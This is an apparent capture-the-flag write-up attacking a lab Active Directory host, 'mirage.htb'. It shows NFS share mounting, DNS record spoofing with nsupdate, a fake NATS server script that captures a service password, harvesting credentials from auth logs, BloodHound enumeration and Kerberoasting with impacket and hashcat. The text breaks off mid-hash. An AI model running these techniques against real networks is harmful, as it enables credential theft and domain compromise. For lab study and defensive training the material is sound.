Nmap
/usr/lib/nmap/nmap --privileged -sC -sV -Pn -oN ./nmap.txt 10.xx.xx.xx
Nmap scan report for 10.xx.xx.xx Host is up (0.43s latency).
Not shown: 985 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-20 11:19:33Z)
111/tcp open rpcbind?
|_rpcinfo: ERROR: Script execution failed (use -d to debug)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
2049/tcp open mountd 1-3 (RPC #100005)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
|_ssl-date: TLS randomness does not represent time
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
50300/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| smb2-time:
|_clock-skew: -2h59m07s
Add dc01.mirage.htb and mirage.htb to our/etc/hosts
NFS service
Firstly, we don't have any default credentials, but we see that the NFS service is enabled.
2049/tcp open mountd 1-3 (RPC #100005)
┌──(kali㉿kali)-[~]
└─$ showmount -e 10.xx.xx.xx
Export list for 10.xx.xx.xx:
/MirageReports (everyone)
So let's mount it to our local machine and check what things in that
┌──(kali㉿kali)-[~]
└─$ mkdir /tmp/mirage
┌──(kali㉿kali)-[~]
└─$ sudo mount -t nfs 10.xx.xx.xx:/MirageReports /tmp/mirage
Then we can check it and we found there are 2 pdf files
┌──(root㉿kali)-[/tmp/mirage]
└─# ls
Incident_Report_Missing_DNS_Record_nats-svc.pdf
Mirage_Authentication_Hardening_Report.pdf
Incident_Report_Missing_DNS_Record_nats-svc.pdf
Mirage_Authentication_Hardening_Report.pdf
To summarize more concisely:
- Abandon
NTLMauthentication and switch to aKerberos-onlyauthentication mode - Create a
dnsentry fornats-svc.mirage.htband use aresponderto obtain authentication
So let's modify our /etc/krb5.conf file firstly
[libdefaults]
dns_lookup_kdc = false
dns_lookup_realm = false
default_realm = MIRAGE.HTB
[realms]
MIRAGE.HTB = {
kdc = dc01.MIRAGE.HTB
admin_server = dc01.MIRAGE.HTB
default_domain = MIRAGE.HTB
}
[domain_realm]
.MIRAGE.HTB = MIRAGE.HTB
MIRAGE.HTB = MIRAGE.HTB
Then let's make a fake nats-server and use nsupdate to send the update message
fake_server.py
import socket
print("[+] Fake NATS Server listening on 0.0.0.0:4222")
s = socket.socket()
s.bind(("0.0.0.0", 4222))
s.listen(5)
while True:
client, addr = s.accept()
print(f"[+] Connection from {addr}")
# Send fake INFO (obligatoire pour handshake NATS)
client.sendall(b'INFO {"server_id":"FAKE","version":"2.11.0","auth_required":true}\r\n')
data = client.recv(1024)
print("[>] Received:")
print(data.decode())
# Optional: respond with -ERR or close connection
client.close()
Then run the script and send the update message
┌──(kali㉿kali)-[~]
└─$ nsupdate
> server 10.xx.xx.xx > update add nats-svc.mirage.htb 3600 A 10.xx.xx.xx > send
┌──(kali㉿kali)-[~]
└─$ python3 script.py
[+] Fake NATS Server listening on 0.0.0.0:4222
[+] Connection from ('10.xx.xx.xx', 64823)
[>] Received:
CONNECT {"verbose":false,"pedantic":false,"user":"Dev_Account_A","pass":"hx5h7F5554fP@1337!","tls_required":false,"name":"NATS CLI Version 0.2.2","lang":"go","version":"1.41.1","protocol":1,"echo":true,"headers":false,"no_responders":false}
We successfully get one of credit Dev_Account_A:hx5h7F5554fP@1337!
Then we can use natscli to interact with this credit
https://github.com/nats-io
┌──(kali㉿kali)-[~]
└─$ /opt/nats-0.2.4-linux-arm64/nats context add dev-nats \
--server nats://dc01.mirage.htb:4222 \
--user Dev_Account_A \
--password 'hx5h7F5554fP@1337!' \
--description "Dev access"
NATS Configuration Context "dev-nats"
Description: Dev access
Server URLs: nats://dc01.mirage.htb:4222
Username: Dev_Account_A
Password: ******************
Path: /home/kali/.config/nats/context/dev-nats.json
┌──(kali㉿kali)-[~]
└─$ /opt/nats-0.2.4-linux-arm64/nats --context dev-nats sub ">" --count 10
We successfully get connect to NATs service here.
Now we should focus on the auth_logs stream and get historical messages through the JetStream consumer next command.
┌──(kali㉿kali)-[~]
└─$ /opt/nats-0.2.4-linux-arm64/nats --context dev-nats consumer add auth_logs audit-reader --pull --ack=explicit
Configuration:
Name: audit-reader
Pull Mode: true
Filter Subject: logs.auth
Deliver Policy: All
Ack Policy: Explicit
Ack Wait: 30.00s
Replay Policy: Instant
Maximum Deliveries: 1
Max Ack Pending: 5
Max Waiting Pulls: 512
State:
Host Version: 2.11.3
Required API Level: 0 hosted at level 1
Last Delivered Message: Consumer sequence: 0 Stream sequence: 0
Acknowledgment Floor: Consumer sequence: 0 Stream sequence: 0
Outstanding Acks: 0 out of maximum 5
Redelivered Messages: 0
Unprocessed Messages: 5
Waiting Pulls: 0 of maximum 512
Then let's pull the messages
┌──(kali㉿kali)-[~]
└─$ /opt/nats-0.2.4-linux-arm64/nats --context dev-nats consumer next auth_logs audit-reader --count=5 --wait=5s --ack
[15:20:12] subj: logs.auth / tries: 1 / cons seq: 1 / str seq: 1 / pending: 4
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.xx.xx.xx"}
Acknowledged message after 629.702564ms delay
[15:20:13] subj: logs.auth / tries: 1 / cons seq: 2 / str seq: 2 / pending: 3
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.xx.xx.xx"}
Acknowledged message after 358.081989ms delay
[15:20:14] subj: logs.auth / tries: 1 / cons seq: 3 / str seq: 3 / pending: 2
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.xx.xx.xx"}
Acknowledged message after 2.428837443s delay
[15:20:18] subj: logs.auth / tries: 1 / cons seq: 4 / str seq: 4 / pending: 1
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.xx.xx.xx"}
Acknowledged message after 549.003677ms delay
[15:20:19] subj: logs.auth / tries: 1 / cons seq: 5 / str seq: 5 / pending: 0
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.xx.xx.xx"}
Acknowledged message after 3.238919648s delay
We successfully get another credential: david.jjackson:pN8kQmn6b86!1234@
Then let's check the credit
┌──(kali㉿kali)-[~]
└─$ sudo ntpdate dc01.mirage.htb
2025-07-20 12:30:51.216502 (+0000) -10324.444328 +/- 0.233875 dc01.mirage.htb 10.xx.xx.xx s1 no-leap
CLOCK: time stepped by -10324.444328
┌──(kali㉿kali)-[~]
└─$ nxc ldap 10.xx.xx.xx -u david.jjackson -p 'pN8kQmn6b86!1234@' -k
LDAP 10.10.11.7 389 DC01 [*] None (name:DC01) (domain:mirage.htb)
LDAP 10.10.11.7 389 DC01 [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@
And also, we can enumerate the user lists
┌──(kali㉿kali)-[~]
└─$ nxc ldap 10.xx.xx.xx -u david.jjackson -p 'pN8kQmn6b86!1234@' -k --users
LDAP 10.xx.xx.xx 389 DC01 [*] None (name:DC01) (domain:mirage.htb)
LDAP 10.xx.xx.xx 389 DC01 [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@
LDAP 10.xx.xx.xx 389 DC01 [*] Enumerated 10 domain users: mirage.htb
LDAP 10.xx.xx.xx 389 DC01 -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.xx.xx.xx 389 DC01 Administrator 2025-06-23 21:18:18 0 Built-in account for administering the computer/domain
LDAP 10.xx.xx.xx 389 DC01 Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.xx.xx.xx 389 DC01 krbtgt 2025-05-01 07:42:23 0 Key Distribution Center Service Account
LDAP 10.xx.xx.xx 389 DC01 Dev_Account_A 2025-05-27 14:05:12 0
LDAP 10.xx.xx.xx 389 DC01 Dev_Account_B 2025-05-02 08:28:11 1
LDAP 10.xx.xx.xx 389 DC01 david.jjackson 2025-05-02 08:29:50 0
LDAP 10.xx.xx.xx 389 DC01 javier.mmarshall 2025-07-20 06:32:54 0 Contoso Contractors
LDAP 10.xx.xx.xx 389 DC01 mark.bbond 2025-06-23 21:18:18 0
LDAP 10.xx.xx.xx 389 DC01 nathan.aadam 2025-06-23 21:18:18 0
LDAP 10.xx.xx.xx 389 DC01 svc_mirage 2025-05-22 20:37:45 0 Old service account migrated by contractors
Also we can bloodhound this user
┌──(kali㉿kali)-[~]
└─$ bloodhound-python -u david.jjackson -p 'pN8kQmn6b86!1234@' -k -d mirage.htb -ns 10.xx.xx.xx -c ALl --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: mirage.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.mirage.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.mirage.htb
INFO: Found 12 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 21 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.mirage.htb
INFO: Done in 01M 41S
INFO: Compressing output into 20250720123334_bloodhound.zip
Sibling Objects in the Same OU
We can try to use impacket-GetUserSPNs to get the krbs hash of Nathan
┌──(kali㉿kali)-[~]
└─$ impacket-GetUserSPNs 'mirage.htb/david.jjackson' -dc-host dc01.mirage.htb -k -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------ ------------ ------------------------------------------------------------------- -------------------------- -------------------------- ----------
HTTP/exchange.mirage.htb nathan.aadam CN=Exchange_Admins,OU=Groups,OU=Admins,OU=IT_Staff,DC=mirage,DC=htb 2025-06-23 21:18:18.584667 2025-07-20 06:49:05.069834
Then we can use hashcat to crack the password of nathan
┌──(kali㉿kali)-[~]
└─$ hashcat nathan.hash /usr/share/wordlists/rockyou.txt -m 13100 --show
$krb5tgs$23$*nathan.aadam$MIRAGE.HTB$mirage.htb/